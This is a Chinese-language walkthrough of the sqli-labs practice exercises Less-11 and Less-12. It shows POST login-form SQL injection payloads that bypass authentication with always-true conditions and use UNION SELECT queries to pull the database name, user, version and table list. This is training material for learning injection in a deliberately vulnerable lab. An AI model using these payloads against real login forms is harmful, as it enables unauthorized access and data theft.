Less-11sql-labs-Less-11、12

我们尝试随便输入一个账户密码看会有什么效果
sql-labs-Less-11、12
发现报错,没有返回内容

我们再次尝试(在#以后的内容被注释掉)
sql-labs-Less-11、12
返回正确内容
sql-labs-Less-11、12
然后我们用万能**来尝试下
username 输入:admin’or’1’='1#,密码随意
返回
sql-labs-Less-11、12
猜数据库

Username:1admin'union select 1,database()#
passwd=1(任意密码)

sql-labs-Less-11、12
猜用户名

Username:1admin'union select 1,user()#
passwd=1(任意密码)

sql-labs-Less-11、12
猜版本

Username:1admin'union select 1,version()#
    passwd=1(任意密码)

sql-labs-Less-11、12
还可以利用其他的方法进行注入。前10题在 get 型注入中提到的语句都可以使用。

爆数据表
Username:1admin’union select 1,group_concat(table_name) from information_schema.tables where table_schema =’security‘#
passwd=1(任意密码)

sql-labs-Less-11、12

Less-12

输入username:admin’,密码随意,无返回内容
,我们尝试,输入username:admin“,密码随意
sql-labs-Less-11、12
故,输入username:admin“)#,密码随意
返回
sql-labs-Less-11、12
我们用 admin”)or 1=1#登录
sql-labs-Less-11、12
居然不是admin登录,而是Dump登录(sql执行的优先级问题)
其余的与less-11相似

相关文章: